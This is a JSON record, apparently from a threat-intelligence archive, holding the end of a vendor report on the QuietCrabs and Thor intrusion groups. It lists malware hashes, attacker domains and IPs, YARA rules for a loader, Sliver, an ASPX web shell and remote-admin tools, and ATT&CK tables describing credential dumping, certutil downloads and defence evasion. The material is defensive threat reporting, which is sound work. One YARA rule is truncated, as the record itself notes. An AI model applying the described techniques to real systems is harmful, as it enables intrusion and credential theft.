db88cb8ee5672afab012376a8add1e8362e75c1e6\r\n088cafef0b7a6aca4bda65a91e79a34a 7c0b195fc4b820450e14fd8104574e62a3cda8d8 e4e7c6bd2250b513383839f6ff805cb333a957530\r\nde15e309e157b46d97dbec5849945c1c a8f7bf6302c5ccd9888d31289229426008b7e2d6 e5abc07aa76e6c1997d6a732cbd1b51b14badfbed\r\n5b81a0fa12e8fad652fbaa77ee9242dc ca24f43e6cdce43ba4852a5974271686725084e0 f7c0917e19af0282da27d54dd951f78042965fe6d\r\n765a29cc2645f0edfdd33ed59db3f2dc 74dea4e8930cac7f8d9a63989fbd6bb27ae7c598 7c2dcf05663b71877e2650d63c52a624ca7319e40\r\n7d190efc6f17869ee01cf667c90d0211 582a672fb25cdf248e5a67630468225e8a8af7ef 32b40914bf7d01b2b0c3536835314f03f07ea8108\r\nabc167768fb1113e21428499745a239f b56ece0eafff9b8c79aba879a115fb01a5905f29 929e3fdd3068057632b52ecdfd575ab389390c852\r\nf46539cb4c18bccf3ccd35dbd973c901 3a5286acc24ec8c933182fcaccc094de148d8e06 2890a9970502a7c20477a437571a260cb96375e6\r\n2fcde88eedb3414b9f0ce60fad83bf45 4d42b371508256000cd5de530ca0131d51939421 9558d1f46182f5275c8a5578bc8dad63ad776b7f1\r\n6cd3e6ece8d01858faf562b77903bc43 1604a8130412e6824dca40b38a91114ffbc6bfe4 c8d64b4eb7c21ae03595576cb633b2b831e82496\r\ne83a67a484b56684f1c7cc8cb0f071e4 d40e81552c778a66b2ca01eb38245acc63a19d5b dd4f25657c4df7983c0d12b597df1ce737eeebd1c\r\n88576ff9320ae2c6de87dc6082f02527 0836c7c544f231d6995f7a87b34b2c8875328b17 ea41a8f0aa1c0dc365258902bde3e87529e4af2a8\r\nfd9a345badc25e6d58361becb517a0c2 d61c9eba6d8267ed5836f670f58c9b12a737f89d f6665f41a2ea7c5eacbd908210ab332ba9a1f60c14\r\nSliver\r\nMD5 hashes SHA-1 hashes SHA-256 hashes (SHA-256 values are truncated in this copy)\r\n23439741ee63a4ff744e5c3ab1fbba3d 69840ab5f82d90c3d9747e20f44d84209c9e3eb4 3581d7ef15130fe82e34ee431985f101fbeb96857\r\nc4df40b8250a72ef394a6d844765cbda 7cb4aee887a9e39b4cb9cd4c9c2cff3b037d85b5 8f651136b7ba3d63d018a6f12ffd073d1c0033e7b\r\n070170515d7d1d982164a5a3dd96d5e3 db3918814d6cb13257ba9e55e6adb1b090a422a6 1a17367608e79dba1e63348e5d791ff1658621bf8\r\n6ca0408e78c732f533dee2bd84df9961 28a4b6c7fd996ce277e4e4fcb7f83df529164afb 
21b8e487d5879ff08d01316dbfb298e1c5e93b560\r\n4e37da111b8be06a8fa3312cde33b79e 979709f50797b992e07cbc2b0779509c5edd516c 52ec5c307cc5ba5790434bbf334168d22ed8b7e20\r\nb3049fd5189440246472bbd3216f7038 78494559881d5e8192f82d5e9a6e8b0b8e96449e 8e551182f760435151052778c9f51e8cfa6637ef2\r\n31c14a5c7bdb550a950a784c77840712 1c28b0871c5549e9f4dbc60b08e547d4fd786be0 20683be010f0ca076bf5b0a0ee0838c116f7554ce\r\ne60d9dee3ead2d70be5824d7659a134f cbd9938805af96b4b6bee1865a27272f62340085 a2326928c3ec6630e60642f0284ed994185efbfce\r\nNetwork IoCs associated with QuietCrabs\r\nThe S3 entries are attacker-controlled buckets on shared Amazon infrastructure: block or alert on the full bucket hostname, not on s3.amazonaws.com.\r\nIndicators\r\ndjango-server.s3.amazonaws.com\r\nomnileadzdev.s3.amazonaws.com\r\nspyne-test.s3.amazonaws.com\r\nkia-almotores.s3.amazonaws.com\r\ndevscout.s3.amazonaws.com\r\ntnegadge.s3.amazonaws.com\r\ngaadhi.s3.amazonaws.com\r\nsay2me.s3.amazonaws.com\r\nlevar-viewer.s3.amazonaws.com\r\ngtisstorage.s3.amazonaws.com\r\ncdn-chromos.s3.amazonaws.com\r\nballour.s3.amazonaws.com\r\nthe-mentor.s3.amazonaws.com\r\nlive-360.s3.amazonaws.com\r\nanc-media.s3.amazonaws.com\r\ncheck.learnstore.vip\r\nmusic.learnstore.vip\r\nupdate.learnstore.vip\r\napi.learnstore.vip\r\nvideo-dev.learnstore.vip\r\napi-dev.learnstore.vip\r\nmusic-dev.learnstore.vip\r\ncheck-dev.learnstore.vip\r\n143.198.8.180\r\n174.138.95.60\r\n157.245.175.86\r\n165.232.162.99\r\n167.172.64.55\r\n167.172.77.125\r\n178.128.124.227\r\n178.128.53.239\r\n207.154.235.215\r\n213.183.54.111\r\n216.45.58.177\r\n223.76.236.178\r\n223.76.236.179\r\n23.95.193.164\r\n64.226.98.34\r\n8.211.157.186\r\n134.122.25.236\r\n138.68.94.205\r\n156.238.224.82\r\n139.59.39.19\r\nNetwork IoCs associated with 
Thor\r\nIndicators\r\n95.142.40.51\r\n161.97.136.74\r\n194.14.217.63\r\n213.183.57.51\r\n188.127.241.179\r\n91.231.186.5\r\n192.121.113.123\r\n192.121.171.245\r\n194.68.44.151\r\nFile signatures\r\nThe condition of the Sliver rule is cut off in this copy; the other rules are complete.\r\nrule PTESC_apt_win_ZZ_QuietCrabs__Trojan__KrustyLoader {\r\n  strings:\r\n    $code = {\r\n      BF ?? ?? ?? ??\r\n      48 8D ?D ?? ?? ?? ??\r\n      [0-9]\r\n      81 FF ?? ?? ?? ??\r\n      74 ??\r\n      [0-1] 81 FF ?? ?? ?? ??\r\n      74 ??\r\n      [0-1] 81 FF ?? ?? ?? ??\r\n      0F 84 ?? ?? ?? ??\r\n      [0-1] 81 FF ?? ?? ?? ??\r\n      0F 85 ?? ?? ?? ??\r\n      E9\r\n    }\r\n    $s1 = \"[-]ResumeThread failed: \"\r\n    $s2 = \"[-]Unknow IMAGE_OPTIONAL_HEADER type for machine type: \"\r\n  condition:\r\n    ((uint16(0) == 0x5a4d) and (all of them))\r\n}\r\n\r\nrule PTESC_tool_win_ZZ_Sliver__Backdoor {\r\n  strings:\r\n    $c = {\r\n      0F B6 54 0C ??\r\n      0F B6 5C 0C ??\r\n      31 DA\r\n      88 14 08\r\n      48 FF C1\r\n      48 83 F9 0C\r\n      7C\r\n    }\r\n    $r = /([a-z]{10}\\/){4}[a-z]{10}\\.\\(\\*[A-Z][a-z]{9}\\)/\r\n    $s_bishopfox = \"bishopfox\"\r\n    $s_github = \"github.com/bishopfox/sliver\"\r\n    $s_obf1 = \".Cleanup.func\"\r\n    $s_obf2 = \".ConnectRemote.func\"\r\n    $s_obf3 = \".SessionInit.func\"\r\n    $s_obf4 = \".func500\"\r\n    $s_obf5 = \".makeConnectedServerPipe.func\"\r\n    $s_obf6 = \".phpURL.func\"\r\n    $s_obf7 = \".readWinHttpProxy.func\"\r\n    $s_obf8 = \".txtURL.func\"\r\n    $s_obf9 = /main\\.[a-z]{10}\\.func5/\r\n    $s_sliver = \"sliver\"\r\n  condition:\r\n    uint16(0) == 0x5A4D and (all of ($s_obf*) or (#s_sliver \u003e 100 and #s_bishopfox \u003e 100) or any of ($c*) or (any of (\r\n}\r\n\r\nrule PTESC_tool_multi_ZZ_WebShell__Backdoor__ASPX {\r\n  strings:\r\n    $asp = \"\u003c%@\"\r\n    $cmd = \"cmd.exe\"\r\n    $p1 = \"Process()\"\r\n    $p2 = \"System.Diagnostics.Process\"\r\n    $p3 = \"new Process\"\r\n    $v1 = \"Response.Write(\"\r\n    $v2 = \".Start(\"\r\n    $v3 = \"UseShellExecute\"\r\n    $v4 = \"RedirectStandardOutput\"\r\n    $v5 = \"RedirectStandardInput\"\r\n    $v6 = \"Request.Params[\"\r\n    $v7 = \"Request.Headers[\"\r\n    $v8 = \"Request.Files[\"\r\n    $v9 = \"Environment.GetLogicalDrives()\"\r\n    $w1 = \"new FileStream\"\r\n    $w2 = \"new FileInfo\"\r\n    $w3 = \".Write(\"\r\n  condition:\r\n    $asp and filesize \u003c 100KB and (any of ($p*) or 2 of ($w*)) and (3 of ($v*) or 1 of ($v*) and $cmd)\r\n}\r\n\r\nrule PTESC_tool_multi_ZZ_TacticalRMM__RemoteAdmin {\r\n  strings:\r\n    $git = \"amidaware/rmmagent\"\r\n    $s1 = \"Tactical RMM Agent\"\r\n    $s2 = \"Path to custom meshcentral dir\"\r\n    $s3 = \"NatsWSCompression\"\r\n    $s4 = \"nixMeshAgentBin\"\r\n    $s5 = \"limitNatsData\"\r\n    $s6 = \"CleanupAgentUpdates\"\r\n    $s7 = \"GetAgentCheckInConfig\"\r\n    $s8 = \"SendPingCheckResult\"\r\n    $s9 = \"WinSvcCheckResult\"\r\n    $s10 = \"PendingActionPK\"\r\n    $s11 = \"GetCheckInConfFromAPI\"\r\n    $s12 = \"DjangoStringResp\"\r\n  condition:\r\n    (uint32be(0) == 0x7f454c46 or uint16(0) == 0x5a4d) and (5 of ($s*) or #git \u003e 10)\r\n}\r\n\r\nrule PTESC_tool_multi_ZZ_MeshAgent__RemoteAdmin {\r\n  strings:\r\n    $s1 = \"ScriptContainer.heapFinalizer\"\r\n    $s2 = \"place .msh file with this executable\"\r\n    $s3 = \"AgentCore/MeshServer\"\r\n    $s4 = \"('MeshAgent')\"\r\n    $s5 = \"addCompressedModule('agent-installer\"\r\n    $s6 = \"MeshServer_ControlChannel\"\r\n    $s7 = \"Cannot abort operation that is marked as 'wait for result'\"\r\n    $s8 = \"compactDirtyMinimum\"\r\n    $s9 = \"MeshConsole\"\r\n    $s10 = \"Ooops, invalid socket: \"\r\n    $s11 = \"Restart Failed, because Script Engine Stop failed\"\r\n    $s12 = \"Secondary Agent unavailable to assist with self update\"\r\n  condition:\r\n    (uint16(0) == 0x5a4d or uint32be(0) == 0x7f454c46) and 5 of them\r\n}\r\nThe MITRE ATT\u0026CK Matrix\r\nQuietCrabs\r\nID | Name | Description\r\nReconnaissance\r\nT1595.002 | Active Scanning: Vulnerability Scanning | Obtained 
information on vulnerabilities in Microsoft\r\nSharePoint Server\r\nResource Development\r\nT1583.006\r\nAcquire Infrastructure:\r\nWeb Services\r\nUsed Amazon S3 to deliver KrustyLoader and Sliver\r\nT1583.004\r\nAcquire Infrastructure:\r\nServer\r\nUsed the DigitalOcean hosting for C2 servers\r\nT1583.001\r\nAcquire Infrastructure:\r\nDomains\r\nUsed .vip domains for the Sliver C2 framework\r\nT1587.001\r\nDevelop Capabilities:\r\nMalware\r\nUsed their custom malware KrustyLoader in attacks\r\nT1608.001 Stage Capabilities: Upload Malware\r\nInitial Access\r\nT1190\r\nExploit Public-Facing\r\nApplication\r\nExploited CVE-2025-53770, CVE-2025-53771, CVE-2025-\r\n4427, and CVE-2025-4428 for initial access.\r\nExecution\r\nT1059.001\r\nCommand and Scripting\r\nInterpreter: PowerShell\r\nLaunched powershell.exe with the -Command parameter to\r\nrun Invoke-WebRequest and save results to a file\r\nPersistence\r\nT1505.003\r\nServer Software\r\nComponent: Web Shell\r\nAchieved persistence by uploading an ASPX file\r\nimplementing a simple web shell that accepts cmd and\r\ntimeout GET parameters\r\nDefense Evasion\r\nT1055 Process Injection\r\nDownloaded a component of the publicly available Sliver\r\npenetration testing framework and injected it into the\r\nexplorer.exe process\r\nT1027\r\nObfuscated Files or\r\nInformation\r\nEncoded payloads using Base64\r\nCredential Access\r\nT1552 Unsecured Credentials\r\nRetrieved the SharePoint ASP.NET machineKey when\r\nexploiting CVE-2025-53770\r\nDiscovery\r\nT1016\r\nSystem Network\r\nConfiguration Discovery\r\nUsed a PowerShell script (Invoke-WebRequest -Uri\r\nhttp://ifconfig[.]me) to obtain the external IP address of the\r\ncompromised host\r\nCommand and Control\r\nT1105 Ingress Tool Transfer Used KrustyLoader to deliver payloads.\r\nT1071.004\r\nApplication Layer\r\nProtocol: Web Protocols\r\nIn addition to Sliver implants, QuietCrabs loaded files hosted\r\nin Amazon S3 to victim systems over HTTP and HTTPS\r\nDownload 
as:\r\nThor\r\nID Name Description\r\nReconnaissance\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nPage 17 of 20\n\nID Name Description\r\nT1595.002\r\nActive Scanning:\r\nVulnerability Scanning\r\nUsed Fscan to identify vulnerable services\r\nResource Development\r\nT1583.004\r\nAcquire Infrastructure:\r\nServer\r\nUsed servers both for active scanning and as C2 for their\r\nmalware\r\nT1608.002\r\nStage Capabilities:\r\nUpload Tool\r\nPrepared attacks and uploaded tools to their own\r\ninfrastructure in advance\r\nT1608.001\r\nStage Capabilities:\r\nUpload Malware\r\nPrepared attacks and uploaded malware to their own\r\ninfrastructure in advance\r\nT1588.002 Obtain Capabilities: Tool\r\nUsed tools such as mimikatz, GodPotato, and others in their\r\nattacks\r\nInitial Access\r\nT1190\r\nExploit Public-Facing\r\nApplication\r\nExploited CVE-2023-38035 and CVE-2025-53770 for initial\r\naccess\r\nExecution\r\nT1059.001\r\nCommand and Scripting\r\nInterpreter: PowerShell\r\nDownloaded and executed various PowerShell scripts with\r\ncertutil, and used the PowerShel-based ADRecon tool\r\nT1059.003\r\nCommand and Scripting\r\nInterpreter: Windows\r\nCommand Shell\r\nRan some scripts via cmd.exe\r\nT1059.005\r\nCommand and Scripting\r\nInterpreter: Visual Basic\r\nUsed various Visual Basic scripts in their attacks\r\nPersistence\r\nT1543.003\r\nCreate or Modify System\r\nProcess: Windows\r\nService\r\nAchieved persistence by installing MeshAgent and Tactical\r\nRMM as services\r\nT1136.001\r\nCreate Account: Local\r\nAccount\r\nCreated srv accounts\r\nT1098.007\r\nAccount Manipulation:\r\nAdditional Local or\r\nDomain Groups\r\nAdded the srv account to the local administrator group\r\nT1053 Scheduled Task/Job Created scheduled tasks\r\nT1133 External Remote Services\r\nAccessed employee mailboxes via Outlook Web Access\r\n(OWA)\r\nPrivilege Escalation\r\nT1548\r\nAbuse Elevation Control\r\nMechanism\r\nUsed the public 
GodPotato utility for privilege escalation\r\nT1078.002\r\nValid Accounts: Domain\r\nAccounts\r\nUsed domain accounts for lateral movement and further\r\nattack development\r\nT1078.003\r\nValid Accounts: Local\r\nAccounts\r\nUsed the created local srv account for RDP access\r\nDefense Evasion\r\nT1078 Valid Accounts\r\nPerformed Kerberos authentication over SSH and corporate\r\nVPN using compromised credentials to access internal\r\nsystems\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nPage 18 of 20\n\nID Name Description\r\nT1562 Impair Defenses\r\nDownloaded and ran PowerShell scripts designed to add\r\nTactical RMM and MeshAgent to Windows Defender EPP\r\nexclusions\r\nT1218\r\nSystem Binary Proxy\r\nExecution\r\nRan the Windows native setx.exe utility to set environment\r\nvariables, as well as the native Windows Server configuration\r\nutility\r\nT1027\r\nObfuscated Files or\r\nInformation\r\nEncoded payloads using Base64\r\nCredential Access\r\nT1003 OS Credential Dumping Used secretsdump and mimikatz to extract account data\r\nT1552.004 Unsecured Credentials\r\nRetrieved the SharePoint ASP.NET machineKey while\r\nexploiting CVE-2025-53770\r\nDiscovery\r\nT1018\r\nRemote System\r\nDiscovery\r\nTested network connectivity using the Test-NetConnection\r\ncommand to verify the availability of remote systems before\r\nloading a reverse shell\r\nT1482 Domain Trust Discovery\r\nUsed ADRecon for Active Directory reconnaissance, saving\r\nresults to C:/Users/srv/Desktop/ADRecon-Report-date.zip,\r\nwhich was later accessed by the attackers\r\nT1046\r\nNetwork Service\r\nDiscovery\r\nCollected information about services for subsequent\r\nvulnerability exploitation\r\nT1016\r\nSystem Network\r\nConfiguration Discovery\r\nUsed the ADRecon tool to collect information\r\nT1082\r\nSystem Information\r\nDiscovery\r\nRan systeminfo and whoami /priv to obtain host details,\r\nincluding OS information, current user, and 
privileges\r\nT1057 Process Discovery\r\nUsed tasklist and native Windows utilities to obtain the list of\r\nprocesses running on a compromised host\r\nT1083\r\nFile and Directory\r\nDiscovery\r\nExecuted dir C:\\users\\public and type C:/users/public/res.txt\r\nto obtain the contents of C:\\Users\\Public and create (read)\r\nres.txt\r\nT1482 Domain Trust Discovery\r\nRan nltest /dclist to obtain the list of domain controllers and\r\nnltest /trusted_domains to obtain the list of trusted domains\r\nT1087.002\r\nAccount Discovery:\r\nDomain Account\r\nUsed the Windows native quser utility to collect information\r\nabout user sessions on remote desktop session host servers\r\nT1033\r\nSystem Owner/User\r\nDiscovery\r\nRan whoami to determine the current user\r\nT1069\r\nPermission Groups\r\nDiscovery\r\nRan the public ADRecon utility for Active Directory\r\nreconnaissance\r\nLateral Movement\r\nT1021.001\r\nRemote Services: Remote\r\nDesktop Protocol\r\nUsed RDP user accounts, including those they created, for\r\nlateral movement\r\nT1021.002\r\nRemote Services:\r\nSMB/Windows Admin\r\nShares\r\nAttempted to use SMB connections for lateral movement\r\nT1021.004 Remote Services: SSH\r\nPerformed Kerberos authentication over SSH using\r\ncompromised credentials\r\nT1210\r\nExploitation of Remote\r\nServices\r\nExploited CVE-2020-1472 for further lateral movement\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nPage 19 of 20\n\nID Name Description\r\nT1550.003\r\nUse Alternate\r\nAuthentication Material:\r\nPass the Ticket\r\nAttempted Kerberos authentication to connect to hosts using\r\na previously compromised user account\r\nCollection\r\nT1213.001\r\nData from Information\r\nRepositories: Confluence\r\nCollected information from multiple spaces in Atlassian\r\nConfluence\r\nT1114 Email Collection\r\nCompromised employee email data and accessed multiple\r\nmailboxes potentially containing confidential 
information\r\nCommand And Control\r\nT1219 Remote Access Tools\r\nInstalled Tactical RMM and MeshAgent to obtain remote\r\naccess and control\r\nT1105 Ingress Tool Transfer\r\nUsed certutil to download various PowerShell scripts and\r\nutilities such as GodPotato, Cobalt Strike, and others\r\nDownload as:\r\nShare link\r\nSource: https://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/\r\nPage 20 of 20",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/dragons-in-thunder/"
	],
	"report_names": [
		"dragons-in-thunder"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "b2e48aa5-0dea-4145-a7e5-9a0f39d786d8",
			"created_at": "2024-01-18T02:02:34.643994Z",
			"updated_at": "2026-04-10T02:00:04.959645Z",
			"deleted_at": null,
			"main_name": "UNC5221",
			"aliases": [
				"UNC5221",
				"UTA0178"
			],
			"source_name": "ETDA:UNC5221",
			"tools": [
				"BRICKSTORM",
				"GIFTEDVISITOR",
				"GLASSTOKEN",
				"LIGHTWIRE",
				"PySoxy",
				"THINSPOOL",
				"WARPWIRE",
				"WIREFIRE",
				"ZIPLINE"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "6ce34ba9-7321-4caa-87be-36fa99dfe9c9",
			"created_at": "2024-01-12T02:00:04.33082Z",
			"updated_at": "2026-04-10T02:00:03.517264Z",
			"deleted_at": null,
			"main_name": "UTA0178",
			"aliases": [
				"UNC5221",
				"Red Dev 61"
			],
			"source_name": "MISPGALAXY:UTA0178",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434390,
	"ts_updated_at": 1775791474,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/640b2ead9c53caeecfe0eddaedfd4b9b453e63e7.pdf",
		"text": "https://archive.orkl.eu/640b2ead9c53caeecfe0eddaedfd4b9b453e63e7.txt",
		"img": "https://archive.orkl.eu/640b2ead9c53caeecfe0eddaedfd4b9b453e63e7.jpg"
	}
}